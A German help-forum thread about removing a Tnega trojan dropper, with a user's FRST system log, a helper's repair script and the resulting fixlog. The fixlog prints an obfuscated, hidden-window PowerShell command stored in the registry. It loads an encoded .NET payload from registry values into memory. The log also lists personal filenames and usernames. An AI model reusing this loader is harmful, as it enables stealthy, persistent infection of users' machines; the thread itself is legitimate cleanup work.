HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Run: [HP OfficeJet Pro 7740 (NET)] => C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe [3770504 2018-04-06] (Hewlett Packard -> HP Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)
Startup: C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Laufwerke.bat [2019-01-27] () [Datei ist nicht signiert]

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {08177AF7-895C-4CDE-BB61-C67AFF7D9DED} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {1110DE16-C375-4BCA-B72F-AF617B0D8FFC} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {12C84621-CAA5-4F59-9214-474125FF1AE5} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {19520EC2-6F12-4753-9C89-63BFAACB92B5} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {2AC510A4-884D-4FFB-9DD3-0C03B2C19EFE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)
Task: {62E7827E-C7E1-4C4E-8B46-FF865E056192} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {76D7BBAC-71A9-42F5-AF51-1E7C1279F625} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)
Task: {7F233437-8600-49D7-858A-20C54C7C6662} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)
Task: {81A5CFF9-F6A7-420D-9945-4DA1E902C9A6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9144CA0D-EED9-468E-8BEF-2311B88B92EC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {D67B4130-3DDC-43C9-B002-8ABDC0AB5DD0} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1149336 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)
Task: {DE27C544-B106-4C7D-9BF3-78CA0EA1F81A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{379cb8d3-10a1-4062-b840-8afb6c84784b}: [DhcpNameServer] 192.168.10.1
Tcpip\..\Interfaces\{4cec849f-a057-45bf-a346-ef6290670ce0}: [NameServer] 192.168.10.1
Tcpip\..\Interfaces\{8d46b3e8-e3e4-4d57-9ac0-d4bf3d80561a}: [DhcpNameServer] 192.168.1.250
Tcpip\..\Interfaces\{d94cdd1b-4d3b-485d-8a86-23879c01e60c}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{fb4f79cc-731d-4165-b863-585f13ab9b6f}: [DhcpNameServer] 192.168.178.1

Edge: 
======
DownloadDir: C:\Users\buskr5\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\buskr5\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-07]
Edge DownloadDir: C:\Users\buskr5\Downloads
Edge StartupUrls: Default -> "hxxp://google.de/"

FireFox:
========
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default [2021-01-09]
CHR Extension: (Adblock Plus - kostenloser Adblocker) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2020-12-15]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-08]
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-07]
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1 [2021-01-07]
CHR Extension: (Präsentationen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-11-09]
CHR Extension: (Docs) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2020-11-09]
CHR Extension: (Google Drive) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-09]
CHR Extension: (YouTube) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-11-09]
CHR Extension: (Tabellen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-11-09]
CHR Extension: (Google Docs Offline) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-09]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-11-09]
CHR Extension: (Google Mail) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-09]
CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-09]
CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-07]

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [105240 2017-10-12] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-05-20] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)
R2 DATEV Sicherheitspaket-Basis-Dienst; C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe [408592 2020-10-20] (DATEV eG 08 2 -> DATEV eG)
S3 FBIOSDRVService; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\fbiosdrv-service.exe [130200 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R2 Fuj02e3DriverUtilityService; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe [177432 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R2 iked; C:\Program Files\ShrewSoft\VPN Client\iked.exe [1127736 2013-07-01] (Shrew Soft Inc -> )
R2 ipsecd; C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe [810808 2013-07-01] (Shrew Soft Inc -> )
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12720144 2020-11-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 dlcdcncm; C:\WINDOWS\System32\drivers\dlcdcncm62_x64.sys [92400 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)
S3 dlusbaudio; C:\WINDOWS\system32\DRIVERS\dlusbaudio_x64.sys [238320 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)
R3 FBIOSDRV; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\FBIOSDRV.sys [43672 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R3 fuj02e3; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3.sys [59672 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)
R3 GabiAcpi; C:\WINDOWS\System32\drivers\GabiAcpi.sys [40488 2020-07-15] (FUJITSU CLIENT COMPUTING LIMITED -> Fujitsu Technology Solutions)
U5 KOBCCID; C:\Windows\System32\Drivers\KOBCCID.sys [116864 2019-01-16] (KOBIL Systems GmbH) [Datei ist nicht signiert]
S3 KobilCcid; C:\WINDOWS\System32\drivers\KobilCcid_x64.sys [50432 2019-10-21] (KOBIL Systems GmbH -> KOBIL Systems GmbH)
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2020-05-06] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S4 usbrndis6; C:\WINDOWS\System32\drivers\usb80236.sys [24064 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]
R1 vflt; C:\WINDOWS\system32\DRIVERS\vfilter.sys [24064 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)
S3 vnet; C:\WINDOWS\System32\drivers\virtualnet.sys [17408 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
S3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-09 18:12 - 2021-01-09 18:13 - 000032867 _____ C:\Users\buskr5\Downloads\Addition.txt
2021-01-09 18:10 - 2021-01-09 18:22 - 000019183 _____ C:\Users\buskr5\Downloads\FRST.txt
2021-01-09 18:10 - 2021-01-09 18:10 - 002281472 _____ (Farbar) C:\Users\buskr5\Downloads\FRST64.exe
2021-01-09 15:44 - 2021-01-09 15:44 - 000000000 ____D C:\WINDOWS\system32\appmgmt
2021-01-09 15:27 - 2021-01-09 15:27 - 000000000 ____D C:\Users\ITMueller\AppData\Local\PeerDistRepub
2021-01-09 15:09 - 2021-01-09 15:16 - 000031957 _____ C:\Users\ITMueller\Downloads\Addition.txt
2021-01-09 15:07 - 2021-01-09 15:16 - 000026221 _____ C:\Users\ITMueller\Downloads\FRST.txt
2021-01-09 15:05 - 2021-01-09 18:21 - 000000000 ____D C:\FRST
2021-01-09 15:05 - 2021-01-09 15:05 - 002282496 _____ (Farbar) C:\Users\ITMueller\Downloads\FRST64.exe
2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\Desktop\Verkn
2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\AppData\Roaming\Apple Computer
2021-01-09 15:02 - 2021-01-09 15:03 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Intel
2021-01-07 19:12 - 2021-01-07 19:12 - 000024546 _____ C:\Users\buskr5\Documents\bookmarks_07.01.21.html
2021-01-07 19:11 - 2021-01-07 19:11 - 000048978 _____ C:\Users\buskr5\Documents\cc_20210107_191149.reg
2021-01-07 19:09 - 2021-01-07 19:10 - 000000000 ____D C:\Users\buskr5\Downloads\ccsetup575
2021-01-07 18:52 - 2021-01-07 18:59 - 000000000 ____D C:\AdwCleaner
2021-01-05 09:49 - 2021-01-05 09:49 - 000012437 _____ C:\Users\buskr5\Downloads\Werkdienstwohnung-Werkmietwohnung.pdf
2020-12-21 10:10 - 2020-12-21 10:10 - 000345367 _____ C:\Users\buskr5\Downloads\LRA-WM_ZS_Was_braucht_man_wann_zur_Zulassung_10-2019.pdf
2020-12-21 10:10 - 2020-12-21 10:10 - 000013851 _____ C:\Users\buskr5\Downloads\Erklärung_an_Eides_Statt.pdf
2020-12-21 10:09 - 2020-12-21 10:09 - 000280628 _____ C:\Users\buskr5\Downloads\SEPA_Kombimandat.pdf
2020-12-21 10:04 - 2020-12-21 10:04 - 000020116 _____ C:\Users\buskr5\Downloads\Vollmacht (1).pdf
2020-12-17 08:20 - 2020-12-17 08:20 - 000000000 ____D C:\Users\buskr5\Documents\Lea Schule
2020-12-14 12:10 - 2020-12-14 12:10 - 000196173 _____ C:\Users\buskr5\Desktop\untermietvertrag-mustervorlage-word-pdf.pdf
2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner (3)
2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Isi
2020-12-10 08:55 - 2020-12-10 08:55 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019 (1).pdf
2020-12-10 08:50 - 2020-12-10 08:50 - 000336734 _____ C:\Users\buskr5\Downloads\ESt Krieger, Roland 2019.pdf
2020-12-10 08:47 - 2020-12-10 08:47 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019.pdf
2020-12-10 08:47 - 2020-12-10 08:47 - 000199415 _____ C:\Users\buskr5\Downloads\Krieger Steuerbericht 2019.pdf
2020-12-10 08:45 - 2020-12-10 08:45 - 000140074 _____ C:\Users\buskr5\Downloads\GewSt Krieger Roland 2019.pdf

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2021-01-09 18:21 - 2018-12-17 10:52 - 000000000 __SHD C:\Users\buskr5\IntelGraphicsProfiles
2021-01-09 18:20 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-09 18:20 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-09 18:20 - 2018-12-17 10:05 - 000000000 __SHD C:\Users\ITMueller\IntelGraphicsProfiles
2021-01-09 18:17 - 2018-12-19 09:09 - 000000000 ____D C:\01_Laufwerke
2021-01-09 17:55 - 2020-07-16 07:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-09 16:01 - 2018-12-18 08:26 - 000002350 _____ C:\Users\buskr5\Desktop\INCOGNITO.lnk
2021-01-09 15:48 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\ConnectedDevicesPlatform
2021-01-09 15:44 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-09 15:44 - 2018-12-19 10:28 - 000000000 ____D C:\Program Files (x86)\InstallShield Installation Information
2021-01-09 15:36 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-09 15:19 - 2018-12-17 09:52 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Packages
2021-01-09 15:18 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-09 15:04 - 2020-07-16 08:02 - 000003368 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1001
2021-01-09 15:04 - 2020-07-15 21:58 - 000002395 _____ C:\Users\ITMueller\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2021-01-09 15:04 - 2018-12-17 09:54 - 000000000 ___RD C:\Users\ITMueller\OneDrive
2021-01-09 15:03 - 2018-12-17 11:01 - 000000000 ____D C:\Users\ITMueller\AppData\Local\Adobe
2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 __RHD C:\Users\Public\AccountPictures
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ___RD C:\Users\ITMueller\3D Objects
2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ____D C:\Users\ITMueller\AppData\Local\ConnectedDevicesPlatform
2021-01-09 15:01 - 2020-06-16 05:58 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 17:24 - 2020-07-16 08:03 - 001632020 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-07 17:24 - 2019-12-07 15:51 - 000707136 _____ C:\WINDOWS\system32\perfh007.dat
2021-01-07 17:24 - 2019-12-07 15:51 - 000142394 _____ C:\WINDOWS\system32\perfc007.dat
2021-01-07 17:17 - 2020-12-07 10:38 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-07 17:17 - 2020-07-16 08:02 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-07 17:17 - 2020-07-16 07:55 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-07 17:17 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2021-01-07 17:17 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2021-01-07 07:23 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\Packages
2021-01-07 07:21 - 2018-12-17 17:20 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-05 12:52 - 2018-12-20 11:36 - 000002248 ____H C:\Users\buskr5\Documents\Default.rdp
2021-01-05 12:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp
2021-01-05 12:04 - 2019-04-30 07:26 - 000031577 _____ C:\Users\buskr5\Desktop\Monatliche Abzüge.xlsx
2020-12-28 09:55 - 2019-11-12 09:00 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner
2020-12-27 10:42 - 2018-12-17 10:24 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-12-17 12:50 - 2020-07-16 08:02 - 000003362 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1002
2020-12-17 12:50 - 2020-07-15 21:58 - 000002386 _____ C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-12-17 12:50 - 2018-12-17 10:54 - 000000000 ___RD C:\Users\buskr5\OneDrive
2020-12-16 11:01 - 2018-12-17 10:54 - 000000000 ____D C:\Users\buskr5\AppData\Local\PlaceholderTileLogoFolder
2020-12-14 08:49 - 2018-12-17 11:06 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-10 09:12 - 2019-09-16 11:29 - 000000000 ___RD C:\Users\buskr5\Desktop\Schulkinder

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2019-01-16 11:54 - 2019-01-16 11:54 - 000000463 _____ () C:\Users\buskr5\AppData\Local\belegtransfer_setup.log

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         

Alt 10.01.2021, 00:27   #5
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Scripting/Repair mit FRST64
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    cmd: reg query "HKCU\Environment"
    cmd: reg query "HKCU\Software"
    cmd: netsh advfirewall reset
    emptytemp:
    End::
             
  • Starte nun FRST und klicke direkt den Reparieren Button.Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 10.01.2021, 00:44   #6
ql-_-lp
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von buskr5 (10-01-2021 00:41:03) Run:1
Gestartet von C:\Users\buskr5\Downloads
Geladene Profile: buskr5
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
cmd: reg query "HKCU\Environment"
cmd: reg query "HKCU\Software"
cmd: netsh advfirewall reset
emptytemp:

*****************


========= reg query "HKCU\Environment" =========


HKEY_CURRENT_USER\Environment
    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
    TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    TMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    OneDrive    REG_EXPAND_SZ    C:\Users\buskr5\OneDrive
    buskr5    REG_SZ    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"                       -windowstyle hidden  -En "PAAjACAAYgBuAHkAegBxAHkAaAB2AGIAeAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "                      


========= Ende von CMD: =========


========= reg query "HKCU\Software" =========


HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\Alps
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\Apple Computer, Inc.
HKEY_CURRENT_USER\Software\Apple Inc.
HKEY_CURRENT_USER\Software\BEDI_BelegTransfer
